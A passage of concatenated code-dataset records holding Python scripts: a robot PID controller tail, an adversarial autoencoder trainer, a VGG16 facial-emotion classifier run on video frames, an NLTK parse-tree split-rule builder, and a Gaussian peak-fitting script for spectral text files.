(error*.02)\n\t\tderivative = (error - self.previous_error) / .02\n\t\tself.rcw = self.P*error + self.I*self.integral + self.D*derivative\n\t\t# print (self.rcw)\n\n\n#funcion para correr el codigo del robot utlizando\n# este archivo como el principal\n\nif __name__ == '__main__':\n\twpilib.run(MyRobot)\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":8606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553731238","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom utils import *\nfrom layers import *\nfrom param import param\nfrom tqdm import tqdm\nfrom AEN import AdversarialAutoEncoder\nfrom distribution import diagonal_gaussian, gaussian_mixture\n\n\ndef latent_generator(dist, z_dim, batch_size):\n with tf.variable_scope('generator'):\n if dist == 'gaussian':\n z = diagonal_gaussian(batch_size, n_dim=z_dim)\n elif dist == 'gmm':\n z = gaussian_mixture(batch_size, n_dim=z_dim, n_labels=10, x_var=0.5, y_var=0.1, label_indices=None)\n else:\n raise NotImplementedError\n return z\n\n\nclass Trainer(AdversarialAutoEncoder):\n def __init__(self, train_data, train_size, hps, sess, model):\n super(Trainer, self).__init__(train_data, train_size, hps, sess)\n self.model = model\n self.global_step = 0\n self.lr = self.param.lr\n\n def learn(self):\n self.model.draw_graph()\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.model.lr, beta1=0.5)\n self.opt_r, self.opt_d, self.opt_g = self.model.get_aen_d_g_training_op(self.optimizer)\n self.summary = self.model.get_train_summary()\n\n self.sess.run(tf.global_variables_initializer())\n\n num_batch_per_epoch = int(self.data_size / self.param.batch_size)\n iterator = tf.data.Iterator.from_structure(output_types=self.dataset.output_types,\n output_shapes=self.dataset.output_shapes)\n iterator_init_op = iterator.make_initializer(self.dataset)\n img, label = iterator.get_next()\n\n self.summary_writer = tf.summary.FileWriter(os.path.join(self.param.log_path, self.param.run_name) + '/',\n self.sess.graph)\n self.saver = tf.train.Saver()\n\n with tf.variable_scope('learning'):\n for epoch in tqdm(range(self.param.epoch)):\n self.sess.run(iterator_init_op)\n if epoch == (100 - 1) or epoch == (300 - 1):\n self.lr /= 10\n\n for iter in range(num_batch_per_epoch):\n batch_img, batch_label = self.sess.run([img, label])\n\n prior_latent = latent_generator(self.param.dist, self.param.z_dim, self.batch_size)\n self.global_step += 1\n\n # Train AEN First\n _, summary, loss, recon_img = self.sess.run(\n [self.opt_r, self.summary, self.model.recon_loss, self.model.recon_img],\n feed_dict={self.model.batch_img: batch_img,\n self.model.prior_latent: prior_latent,\n self.model.keep_prob: self.param.keep_prob,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n\n # Train D\n _, d_loss = self.sess.run(\n [self.opt_d, self.model.d_loss],\n feed_dict={self.model.batch_img: batch_img,\n self.model.prior_latent: prior_latent,\n self.model.keep_prob: 1.,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n # Train G\n _, g_loss = self.sess.run(\n [self.opt_g, self.model.g_loss],\n feed_dict={self.model.batch_img: batch_img,\n self.model.keep_prob: 1.,\n self.model.label: batch_label,\n self.model.lr: self.lr\n })\n\n self.summary_writer.add_summary(summary=summary, global_step=self.global_step)\n\n tf.logging.info('{} epoch | {} iter;\\tRecon Loss:{}\\tD Loss:{}\\tG Loss:{}'.format(epoch, iter, loss, d_loss, g_loss))\n\n if self.param.save_img and np.mod(self.global_step, self.param.img_save_freq) == 0:\n save_images(recon_img,\n closest_divisor(recon_img.shape[0]),\n '{}/train_{}.png'.format(\n os.path.join(self.param.img_save_path, self.param.run_name), epoch))\n\n tf.logging.info('{} epoch finished;'.format(epoch))\n\n if self.global_step > int(0.8 * self.param.epoch * num_batch_per_epoch) and \\\n np.mod(epoch, self.param.model_save_freq) == 0:\n self.saver.save(self.sess, os.path.join(self.param.save_path, self.param.run_name) + '/',\n global_step=self.global_step)\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499768314","text":"import os\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport glob\nimport cv2\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Dropout, Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Sequential, load_model\nfrom keras.applications import VGG16\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nemotions = ['angry', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise']\nemotion_dfs = []\n\nfor cntr, emotion in enumerate(emotions) :\n\tfolder = '../../../expression_handling/expressions_db/images/train/' + emotion + '/'\n\tfiles = glob.glob(folder + '/*')\n\timg_names = [f.rsplit('/', maxsplit=1)[1] for f in files]\n\n\tno_files = len(files)\n\tdf = pd.DataFrame()\n\tdf[\"imageName\"] = img_names\n\tdf[\"folderName\"] = [folder] * no_files\n\tdf[\"Emotion\"] = [emotion] * no_files\n\tdf[\"Labels\"] = [cntr+1] * no_files\n\t#print('\\n\\n************************************************')\n\t#print(no_files)\n\t#print(df.head())\n\t#input('enter a key')\n\temotion_dfs.append(df)\n\nemotion_df_final = pd.concat(emotion_dfs)\nprint(emotion_df_final.shape)\n\nemotion_df_final.reset_index(inplace = True, drop = True)\nemotion_df_final = emotion_df_final.sample(frac = 1.0) #shuffling the dataframe\nemotion_df_final.reset_index(inplace = True, drop = True)\nprint(emotion_df_final.head())\n\ntrain_data, df_test = train_test_split(emotion_df_final, stratify=emotion_df_final[\"Labels\"], test_size = 0.197860)\ndf_train, df_cv = train_test_split(train_data, stratify=train_data[\"Labels\"], test_size = 0.166666)\nprint(df_train.shape, df_cv.shape, df_test.shape) # img_nm, folder_nm, emotion, lbl\n\ntrain_lbls = pd.get_dummies(df_train[\"Labels\"]).values\ntest_lbls = pd.get_dummies(df_test[\"Labels\"]).values\ncv_lbls = pd.get_dummies(df_cv[\"Labels\"]).values\nprint(train_lbls.shape, cv_lbls.shape, test_lbls.shape) # one hot encoded 7 lbls\nprint(train_lbls[0:10, :])\nprint(df_train.head())\n\ntrain_pointer = 0\ntest_pointer = 0\ncv_pointer = 0\n\ndef load_batch(bsz, df, labels, start_pointer) :\n\t#global train_pointer\n\tbatch_ims = []\n\tbatch_lbls = []\n\tfor i in range(bsz) :\n\t\tpath1 = df.iloc[start_pointer + i][\"folderName\"]\n\t\tpath2 = df.iloc[start_pointer + i][\"imageName\"]\n\t\timg = cv2.imread(os.path.join(path1, path2))\n\t\timg = cv2.resize(img, (48, 48))\n\t\timg = img / 255.0\n\t\tbatch_ims.append(img)\n\t\tbatch_lbls.append(labels[start_pointer + i])\n\tstart_pointer += i\n\treturn np.array(batch_ims), np.array(batch_lbls), start_pointer\n\n#creating bottleneck features for train data using VGG-16- Image-net model\nmodel = VGG16(weights='imagenet', include_top=False, input_shape=(48,48,3))\nmodel.summary()\ninput('enter a key...')\nSAVEDIR_train = \"data/bottleneck_features/train/\"\nSAVEDIR_LABELS_train = \"data/bottleneck_features/train_labels/\"\nSAVEDIR_cv = \"data/bottleneck_features/cv/\"\nSAVEDIR_LABELS_cv = \"data/bottleneck_features/cv_labels/\"\nSAVEDIR_test = \"data/bottleneck_features/test/\"\nSAVEDIR_LABELS_test = \"data/bottleneck_features/test_labels/\"\n\ndef handle_dset(df, labels, save_dir, savedir_lbls, start_pointer) :\n\tbatch_size = 10\n\tfor i in range(int(len(df)/batch_size)):\n\t\tx, y, start_pointer = load_batch(batch_size, df, labels, start_pointer)\n\n\t\tnp.save(os.path.join(savedir_lbls, \"bottleneck_labels_{}\".format(i+1)), y)\n\n\t\tbottleneck_features = model.predict(x)\n\t\tnp.save(os.path.join(save_dir, \"bottleneck_{}\".format(i+1)), bottleneck_features)\n\t\tif not i%100 :\n\t\t\tprint(\"Creating bottleneck features for batch {}\". format(i+1))\n\t\t\tprint(\"Bottleneck features for batch {} created and saved\".format(i+1))\n\nprint('\\n\\nTRAIN...................')\nhandle_dset(df_train, train_lbls, SAVEDIR_train, SAVEDIR_LABELS_train, train_pointer)\n\nprint('\\n\\nCV...................')\nhandle_dset(df_cv, cv_lbls, SAVEDIR_cv, SAVEDIR_LABELS_cv, cv_pointer)\n\nprint('\\n\\nTEST...................')\nhandle_dset(df_test, test_lbls, SAVEDIR_test, SAVEDIR_LABELS_test, test_pointer)\n\nno_of_classes = 7\ndef get_model(inp_shape) :\n\tmodel = Sequential()\n\n\tmodel.add(Dense(512, activation='relu', input_dim = inp_shape))\n\tmodel.add(Dropout(0.1))\n\n\tmodel.add(Dense(256, activation='relu'))\n\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(BatchNormalization())\n\n\tmodel.add(Dense(64, activation='relu'))\n\tmodel.add(Dense(no_of_classes, activation='softmax'))\n\n\treturn model\n\nSAVER = 'data/model_save'\ninput_shape = 1*1*512\nmodel = get_model(input_shape)\nmodel.summary()\nmodel.compile(loss = 'categorical_crossentropy', optimizer = \"adam\", metrics = [\"accuracy\"])\n\nepochs = 20\nbatch_size = 10\nstep = 0\ntrain_bottleneck_files = int(len(df_train) / batch_size)\ncv_bottleneck_files = int(len(df_cv) / batch_size)\nprint('\\n\\n\\n', train_bottleneck_files, cv_bottleneck_files)\ninput('enter a key...')\nepoch_number, train_loss, train_acc, cv_loss, cv_acc = [], [], [], [], []\n\nfor epoch in range(epochs):\n avg_epoch_tr_loss, avg_epoch_tr_acc, avg_epoch_cv_loss, avg_epoch_cv_acc = 0, 0, 0, 0\n epoch_number.append(epoch + 1)\n \n step = 0\n for i in range(train_bottleneck_files):\n \n step += 1\n \n #loading batch of train bottleneck features for training MLP.\n X_train_load = np.load(os.path.join(SAVEDIR_train, \"bottleneck_{}.npy\".format(i+1)))\n X_train = X_train_load.reshape(X_train_load.shape[0], X_train_load.shape[1]*X_train_load.shape[2]*X_train_load.shape[3])\n Y_train = np.load(os.path.join(SAVEDIR_LABELS_train, \"bottleneck_labels_{}.npy\".format(i+1)))\n \n #loading batch of CV bottleneck features for cross-validation.\n X_cv_load = np.load(os.path.join(SAVEDIR_cv, \"bottleneck_{}.npy\".format((i % cv_bottleneck_files) + 1)))\n X_cv = X_cv_load.reshape(X_cv_load.shape[0], X_cv_load.shape[1]*X_cv_load.shape[2]*X_cv_load.shape[3])\n Y_cv = np.load(os.path.join(SAVEDIR_LABELS_cv, \"bottleneck_labels_{}.npy\".format((i % cv_bottleneck_files) + 1)))\n \n train_Loss, train_Accuracy = model.train_on_batch(X_train, Y_train) #train the model on batch\n cv_Loss, cv_Accuracy = model.test_on_batch(X_cv, Y_cv) #cross validate the model on CV\n \n #print(\"Epoch: {}, Step: {}, Tr_Loss: {}, Tr_Acc: {}, cv_Loss: {}, cv_Acc: {}\".format(epoch+1, step, np.round(float(train_Loss), 2), np.round(float(train_Accuracy), 2), np.round(float(cv_Loss), 2), np.round(float(cv_Accuracy), 2)))\n \n avg_epoch_tr_loss += train_Loss / train_bottleneck_files\n avg_epoch_tr_acc += train_Accuracy / train_bottleneck_files\n avg_epoch_cv_loss += cv_Loss / train_bottleneck_files\n avg_epoch_cv_acc += cv_Accuracy / train_bottleneck_files\n \n print(\"Avg_train_Loss: {}, Avg_train_Acc: {}, Avg_cv_Loss: {}, Avg_cv_Acc: {}\".format(np.round(float(avg_epoch_tr_loss), 2), np.round(float(avg_epoch_tr_acc), 2), np.round(float(avg_epoch_cv_loss), 2), np.round(float(avg_epoch_cv_acc), 2)))\n\n train_loss.append(avg_epoch_tr_loss)\n train_acc.append(avg_epoch_tr_acc)\n cv_loss.append(avg_epoch_cv_loss)\n cv_acc.append(avg_epoch_cv_acc)\n \n model.save(os.path.join(SAVER, \"model_48_48.h5\")) #saving the model on each epoch\n model.save_weights(os.path.join(SAVER, \"model_weights_48_48.h5\")) #saving the weights of model on each epoch\n print(\"Model and weights saved at epoch {}\".format(epoch + 1))\n \nlog_frame = pd.DataFrame(columns = [\"Epoch\", \"Train_Loss\", \"Train_Accuracy\", \"cv_Loss\", \"cv_Accuracy\"])\nlog_frame[\"Epoch\"] = epoch_number\nlog_frame[\"Train_Loss\"] = train_loss\nlog_frame[\"Train_Accuracy\"] = train_acc\nlog_frame[\"cv_Loss\"] = cv_loss\nlog_frame[\"cv_Accuracy\"] = cv_acc\nlog_frame.to_csv(\"data/logs/Log_48_48.csv\", index = False)\nprint(log_frame.head())\n#import sys\n#sys.exit(0)\n\nlog = pd.read_csv(\"data/logs/Log_48_48.csv\")\ndef plotting(epoch, train, cv, title, ylabel):\n fig, axes = plt.subplots(1,1, figsize = (12, 8))\n axes.plot(epoch, train, color = 'red', label = \"Train\")\n axes.plot(epoch, cv, color = 'blue', label = \"CV\")\n axes.set_title(title, fontsize = 25)\n axes.set_xlabel(\"Epochs\", fontsize = 20)\n axes.set_ylabel(ylabel, fontsize = 20)\n axes.grid()\n axes.legend(fontsize = 20)\n\nplotting(list(log[\"Epoch\"]), list(log[\"Train_Loss\"]), list(log[\"cv_Loss\"]), \"EPOCH VS LOSS\", 'Loss')\nplotting(list(log[\"Epoch\"]), list(log[\"Train_Accuracy\"]), list(log[\"cv_Accuracy\"]), \"EPOCH VS ACCURACY\", 'Accuracy')\n\nplt.show()\n\nEMOTION_DICT = {1:\"ANGRY\", 2:\"DISGUST\", 3:\"FEAR\", 4:\"HAPPY\", 5:\"NEUTRAL\", 6:\"SAD\", 7:\"SURPRISE\"}\nmodel_VGG = VGG16(weights='imagenet', include_top=False, input_shape=(48,48,3))\nmodel_top = load_model(\"data/model_save/model_48_48.h5\")\n\nfaceDet_one = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml\")\nfaceDet_two = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt2.xml\")\nfaceDet_three = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt.xml\")\nfaceDet_four = cv2.CascadeClassifier(\"/usr/share/opencv4/haarcascades/haarcascade_frontalface_alt_tree.xml\")\n\ndef make_prediction(path):\n #converting image to gray scale and save it\n img = cv2.imread(path)\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #cv2.imwrite(path, gray)\n \n #detect face in image, crop it then resize it then save it\n #face_cascade = cv2.CascadeClassifier('/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml') \n #img = cv2.imread(path)\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n test_faces = []\n faces = faceDet_one.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n if not len(faces) :\n \tfaces = faceDet_two.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n \tif not len(faces) :\n \t\tfaces = faceDet_three.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n \t\tif not len(faces) :\n \t\t\tfaces = faceDet_four.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5, minSize=(5, 5))\n print(\"{0} FACES DETECTED...\".format(len(faces)))\n for (x,y,w,h) in faces:\n face_clip = img[y:y+h, x:x+w, :]\n face_clip = cv2.resize(face_clip, (48, 48))\n test_faces.append(face_clip)\n \n #read the processed image then make prediction and display the result\n #read_image = cv2.imread(path)\n for img in test_faces :\n read_image = img.reshape(1, img.shape[0], img.shape[1], img.shape[2])\n read_image_final = read_image/255.0 #normalizing the image\n VGG_Pred = model_VGG.predict(read_image_final) #creating bottleneck features of image using VGG-16.\n VGG_Pred = VGG_Pred.reshape(1, VGG_Pred.shape[1]*VGG_Pred.shape[2]*VGG_Pred.shape[3])\n top_pred = model_top.predict(VGG_Pred) #making prediction from our own model.\n emotion_label = top_pred[0].argmax() + 1\n print(\"\\n\\nPredicted Expression Probabilities\")\n print(\"ANGRY: {}\\nDISGUST: {}\\nFEAR: {}\\nHAPPY: {}\\nNEUTRAL: {}\\nSAD: {}\\nSURPRISE: {}\\n\".format(top_pred[0][0], top_pred[0][1], top_pred[0][2], top_pred[0][3], top_pred[0][4], top_pred[0][5], top_pred[0][6]))\n print(\"Dominant Probability = \"+str(EMOTION_DICT[emotion_label])+\": \"+str(max(top_pred[0])))\n print('**********************************************')\n cv2.imshow('face', img)\n cv2.waitKey(3000)\n\ndef FrameCapture(path):\n vidObj = cv2.VideoCapture(path)\n\n # Used as counter variable \n count = 0\n\n while True :\n\n # vidObj object calls read \n # function extract frames \n success, image = vidObj.read()\n if not success : break\n count += 1\n\n # Saves the frames with frame-count \n if not count%50 :\n \tcv2.imwrite(\"frame%d.jpg\" % count, image)\n \tmake_prediction(\"frame%d.jpg\" % count)\n\nFrameCapture('/home/vandana/cv_Project/temp/youtube/eating_icecream1.mp4')\n\n#make_prediction(\"../../../us.jpg\")\n\n","sub_path":"medium_mail/bottleneck_48_48.py","file_name":"bottleneck_48_48.py","file_ext":"py","file_size_in_byte":11890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"528557479","text":"# Local imports\nfrom semstruct import to_struct, to_struct_from_map\n\n# Global imports\nimport pickle\nfrom collections import defaultdict, Counter\nfrom nltk.tree import Tree\n#from _ast import List\n\nclass PrepSplitDict:\n \"\"\"Create the splitting dictionary from the prepped corpus dictionaries.\"\"\"\n \n def __init__(self, prepped_path, tar_path):\n # Initialize split dictionaries\n self.split_dict_unary = defaultdict(Counter)\n self.split_dict_bin = {mode:defaultdict(Counter)\n for mode in ['no','lr','l','r']}\n \n # Fill split dictionaries\n self.process_corpus_dicts(prepped_path)\n \n # Save split dictionaries\n self.save_split_dict(self.split_dict_unary, tar_path+'/sd_unary.pickle')\n self.save_split_dict(self.split_dict_bin, tar_path+'/sd_binary.pickle')\n \n def process_corpus_dicts(self, prepped_path):\n \"\"\"Read the corpus part dicts and add them to the split dictionary.\"\"\"\n # Iterate over all corpus parts\n for p in range(1): # TODO: change to range(100) to iterate all parts\n print('Processing part {0:02d}..'.format(p))\n # Read the prepped dictionaries for this part\n cm_file = open('{0}/p{1:02d}_cm_dict.pickle'.format(prepped_path, p), 'rb')\n cm_dict = pickle.load(cm_file)\n cm_file.close()\n st_file = open('{0}/p{1:02d}_st_dict.pickle'.format(prepped_path, p), 'rb')\n st_dict = pickle.load(st_file)\n st_file.close()\n # Add to split dict the split rules of each sentence\n print(cm_dict)\n for i in range(len(st_dict)):\n st = st_dict[i]\n cm = cm_dict[i]\n print(i)\n print(cm)\n cm_dict_single = self.create_core_meaning_dict(st, cm)\n self.get_split_rules(st, tuple(), cm_dict_single)\n print('Total unary rules:\\t{}'.format(len(self.split_dict_unary)))\n print('Total bin_lr rules:\\t{}'.format(len(self.split_dict_bin['lr'])))\n print('Total bin_l rules:\\t{}'.format(len(self.split_dict_bin['l'])))\n print('Total bin_r rules:\\t{}'.format(len(self.split_dict_bin['r'])))\n print('Total bin rules:\\t{}'.format(len(self.split_dict_bin['no'])))\n \n def get_split_rules(self, subtree, pos, cm_dict):\n \"\"\"Get the split rules for one sentence.\"\"\"\n # The input must be a tree with children that are also trees\n if not (isinstance(subtree, Tree) and isinstance(subtree[0], Tree)):\n return\n \n # If the input tree has one child, extract a unary split rule \n if len(subtree) == 1:\n self.get_split_rule_unary(subtree.label(), subtree[0].label())\n # Else if the input tree has two children, extract a binary split rule\n elif len(subtree) == 2:\n cm_l = True if pos+(0,) in cm_dict else False\n cm_r = True if pos+(1,) in cm_dict else False\n self.get_split_rule_binary(subtree.label(), subtree[0].label(),\n subtree[1].label(), cm_l, cm_r)\n else:\n print('WARNING: Encountered a rule thats not unary or binary.')\n # Recursively get split rules for the child node subtrees\n for i in range(len(subtree)):\n self.get_split_rules(subtree[i], pos+(i,), cm_dict)\n\n def get_split_rule_unary(self, parent, child):\n \"\"\"Get the split rule for a unary node in the tree.\"\"\"\n parent_struct, mapping = to_struct(parent)\n child_struct = to_struct_from_map(child, mapping)\n \n self.split_dict_unary[parent_struct][child_struct] += 1\n\n def get_split_rule_binary(self, parent, left, right, cm_l, cm_r):\n \"\"\"Get the split rule for a binary node in the tree.\"\"\"\n parent_struct, mapping = to_struct(parent)\n left_struct = to_struct_from_map(left, mapping)\n right_struct = to_struct_from_map(right, mapping)\n if cm_l and cm_r:\n self.split_dict_bin['lr'][parent_struct][(left_struct, right_struct)] += 1\n elif cm_l:\n self.split_dict_bin['l'][parent_struct][(left_struct, right_struct)] += 1\n elif cm_r:\n self.split_dict_bin['r'][parent_struct][(left_struct, right_struct)] += 1\n else:\n self.split_dict_bin['no'][parent_struct][(left_struct, right_struct)] += 1\n\n def save_split_dict(self, split_dict, tar_path):\n \"\"\"Save the split dictionary to a file.\"\"\"\n split_file = open(tar_path, 'wb')\n pickle.dump(split_dict, split_file)\n split_file.close()\n \n def create_core_meaning_dict(self, tree, core_meanings):\n \"\"\"Find for every node the list of the core meanings of its descendants.\"\"\"\n core_meaning_dict = defaultdict(list)\n index = 0\n # Loop over all nodes of the tree\n for pos in tree.treepositions():\n subtree = tree[pos]\n # If the node is a leaf node with a core meaning, assign to ancestors\n if isinstance(subtree, str):\n index += 1\n if index in core_meanings:\n #core_meaning = core_meanings[index]\n for i in range(len(pos)+1):\n anc_pos = pos[:i]\n core_meaning_dict[anc_pos].append(index)\n \n return core_meaning_dict\n \nPrepSplitDict('data/gmb-prepped', 'data/split-dicts')","sub_path":"prep_split_dict.py","file_name":"prep_split_dict.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440681424","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 9 13:18:20 2019\r\n\r\n@author: msmith\r\n\r\nEdit Log:\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n\r\nUser Notes:\r\n-------------------------------------------------------------------------------\r\n-Code depend on a '####.#-####.#V' format in the TXT file name as described below:\r\n -The voltage trap values used in a text file be displated in the file name under the\r\n format of the voltages being displayed in the thousands and to a sigle decimal precision\r\n seperated by a dash or space, followed by a capital V, no spaces.\r\n -Example: '1234.5-3456.7V' and '0245.0 0255.5V' Bad:'1234.5-3456.7 V' or '345-123.4V'\r\n \r\n -That there be NO OTHER characters using a capital V in that file name\r\n -Example: Good: 'Example_File_1234.5-3456.7V' and'1234.5-3456.7V Good Name' \r\n Bad: 'Example_Voltage_txt_1234.5-3456.7V' and 'V great data file 1234-3456V'\r\n \r\n-The txt reader skips the first 18 lines, this is becuase these are usualy text,\r\n not data. One can remove this function by commenting out the specified line\r\n within the \"GetData\" function\r\n\r\n-The gaussian will only fit to the highest peak in the spectra \r\n \r\n-This code is writen assuming 1 peak is to be analyzed per file\r\n\r\n-Negative count numbers caused by gaussian fit overestimation are treated as \r\n zeroes\r\n\r\n-Data is not normalized, but could be if you so wished by uncommenting 4th line\r\n after for loop begins in Main fn\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n\"\"\"\r\n# imports\r\nimport numpy\r\nimport os\r\nimport math\r\nfrom scipy.optimize import curve_fit\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Check how many counts are in a peaks left and right tail, and prints those values to a txt file that can be read into excell for graphing\r\n\r\n\r\n\r\n# =============================================================================\r\n# Function definitions\r\n# =============================================================================\r\n\r\n\r\n#---------------------------------GetFiles-------------------------------------\r\n# this function takes 'path', the path to the folder, and returns a list of all the txt files within\r\n\r\ndef GetFiles(path):\r\n files = []\r\n for r, d, f in os.walk(path):# r=root, d=directories, f = files\r\n for file in f:\r\n if '.txt' in file:\r\n files.append(os.path.join(r, file))\r\n return files\r\n \r\n#----------------------------------GetData-------------------------------------\r\n# this function takes a txt file path, reads all data PAST THE 18th LINE and returns the first and second colums as xData and yData respectively\r\n \r\ndef GetData(filePath):\r\n with open(filePath, newline = '') as file:\r\n data_reader = csv.reader(file, delimiter='\\t')\r\n data = [line for line in data_reader]\r\n #line to comment out\r\n data = data[18:] # the first 18 lines are usualy text and not the data\r\n xData = [i[0] for i in data]\r\n yData = [i[1] for i in data]\r\n xData = [float(i) for i in xData]\r\n yData = [float(i) for i in yData]\r\n errorBars = numpy.asarray([math.sqrt(i+1) for i in yData])# also assigns error of yVal+1 shoudl you need that\r\n return [xData,yData,errorBars]\r\n\r\n#----------------------------DataTruncation-------------------------------------\r\n#truncate the data around the central peak for some radius along the x axis\r\ndef DataTruncation(xData,yData,radius):\r\n info=GetMaxInfo(xData,yData)\r\n yMaxIndex=info[1]\r\n newxData=[]\r\n newyData=[]\r\n for counter,x in enumerate(xData):\r\n if abs(x-xData[yMaxIndex])(FWHM/2):\r\n newyData.append(yData[counter])\r\n else:\r\n newyData.append(0)\r\n return newyData\r\n#----------------------------RemoveNegatives-----------------------------------\r\n# all negative values are converted to zeroes\r\n\r\ndef RemoveNegatives(yData):\r\n copy=[]\r\n for y in yData:\r\n if y<0:\r\n copy.append(0)\r\n else:\r\n copy.append(y)\r\n return copy\r\n\r\n#-------------------------------OrderFiles-------------------------------------\r\n# this function is used if you want to order the files by adding their index to the last character of the TXT file name\r\n# example 'txtFile_0.txt' 'txtFile_1.txt'.....\r\n\r\ndef OrderFiles(files):\r\n orderedFiles=[]\r\n indexTracker=[]\r\n for currentIndex,file in enumerate(files):\r\n try:\r\n properIndex=int(file[-6:-4])-1\r\n indexTracker.append(properIndex)\r\n except:\r\n properIndex=int(file[-5])-1\r\n indexTracker.append(properIndex)\r\n for x in range(len(files)):\r\n for idx in indexTracker:\r\n if x==idx:\r\n orderedFiles.append(files[indexTracker.index(idx)])\r\n return orderedFiles\r\n\r\n#-------------------------------SortList--------------------------------------\r\n#sort a list based of ascending order of values a second reference list that is not inherently in ascending order\r\n#assumes Max vakue in the referece list is <100000\r\n#Both list must be the same length, and reference list CANNOT have repeat values\r\n#both lists indecies should be coupled. ie value[4] in list1 corresponds to value[4] in list 2 \r\n \r\ndef SortLists(listToBeSorted, referenceList): \r\n copyReferenceList=referenceList[:]# so that the reference list isnt mutated\r\n sortedList=[]\r\n sortedReferenceList=[]\r\n counter=len(referenceList)# so that we loop through all values in list\r\n while counter>0:\r\n #getting index of min value \r\n minVal=min(copyReferenceList)\r\n minIndex=copyReferenceList.index(minVal)\r\n #assigning that min value in to the new lists\r\n sortedReferenceList.append(minVal)\r\n sortedList.append(listToBeSorted[minIndex])\r\n \r\n #replace the min value with a high number so it does not get counted again\r\n copyReferenceList[minIndex]=100000\r\n counter-=1\r\n return [sortedList,sortedReferenceList]\r\n\r\n#---------------------------GetTurnNumber--------------------------------------\r\n#This gets the number of turns, it is dependent of T### format followed\r\ndef GetTurnNumber(file):\r\n file=file[-55:]\r\n indexT=file.find('T')\r\n turnNumber=int(file[indexT+1:indexT+4])\r\n return turnNumber\r\n\r\n#----------------------GetTrapVoltageSymmerty----------------------------------\r\n#Gets the trap voltage following the format of the voltages being names as followed:\r\n#File name is: \"example-1234.5-1235.5V.txt\", ie the two voltages seperated by a dash\r\n#with a capital V directly afterwards\r\n# can be no other V characters in filename\r\ndef GetTrapVoltlageSymmerty(file):\r\n file=file[-55:]\r\n indexV=file.find('V')\r\n higherVoltage=float(file[indexV-13:indexV-7])\r\n lowerVoltage=float(file[indexV-6:indexV])\r\n difference=lowerVoltage-higherVoltage\r\n return difference\r\n\r\n#---------------------GetFileNameResolvingPower--------------------------------\r\n# this is not currently in use\r\n#This gets the resolving powwer from the txt file name:\r\n#File name is: \"example-1234.5-1235.5V 310k.txt\", ie the 3 didget resolving power folowed by a 'k'\r\n# can be no other 'k' characters in the file name\r\ndef GetFileNameResolvingPower(file):\r\n file=file[-55:]\r\n indexk=file.find('k')\r\n resolvingPower=file[indexk-3:indexk]\r\n return resolvingPower\r\n\r\n#---------------------------GetResolvingPower----------------------------------\r\n#rounds value to the thousands and makes it a string with a k at the end\r\n# assumes the reolving power is greater then 100k\r\n \r\ndef GetResolvingPower(centre,sigma):\r\n resolvingPower=centre/(sigma*2.355)\r\n resolvingPower=int(resolvingPower/1000)\r\n resolvingPower=str(resolvingPower)+' k'\r\n return resolvingPower\r\n# =============================================================================\r\n# Main function\r\n# =============================================================================\r\n \r\ndef Main(): \r\n #path to the folder containing txt files\r\n folderPath='H:\\CountsInTail\\Trap gradient dependence\\Txt files'\r\n files=GetFiles(folderPath)#get all txt files in path\r\n\r\n leftSidePercentages=[]\r\n rightSidePercentages=[]\r\n totalPercentage=[]\r\n resolvingPowers=[]\r\n xAxis=[]\r\n \r\n for file in files:# for each individual txxt file\r\n print(file)\r\n data=GetData(file)\r\n xData=data[0]\r\n yData=data[1]\r\n xVariable=GetTrapVoltlageSymmerty(file)\r\n \r\n #data has to wide of a x axis, we thus remove all data outside of a 0.2 usec radius from the central peak \r\n truncatedData=DataTruncation(xData,yData,0.2)\r\n xData=truncatedData[0]\r\n yData=truncatedData[1]\r\n #yData=Normalized(xData,yData) #Can normalize data if you want, but there is no need\r\n\r\n #assign some variables for later use\r\n integralOfData=ReimannSum(xData,yData)\r\n countsInData=sum(yData)\r\n yMaxInfo=GetMaxInfo(xData,yData)# list giving [LocationofMax,IndexOFMAx (in xData or yData)]\r\n \r\n #fit a gaussian to the data\r\n initialGuesses=[yMaxInfo[0],1,1] # syntax is [center,sigma,amplitude]\r\n popt, pcov = curve_fit(Gaussfunc, xData, yData, p0=initialGuesses) #returned popt is list pf best found fit perameters with same syntax as initialguesses\r\n gaussianFit=Gaussfunc(xData, *popt)\r\n resolvingPowers.append(str(GetResolvingPower(popt[0],popt[1])))#get labels for data with resolving power\r\n \r\n \r\n #Find gaussian chi squared\r\n #NumberofPerameters=3\r\n #errorBars=data[2] #for if you 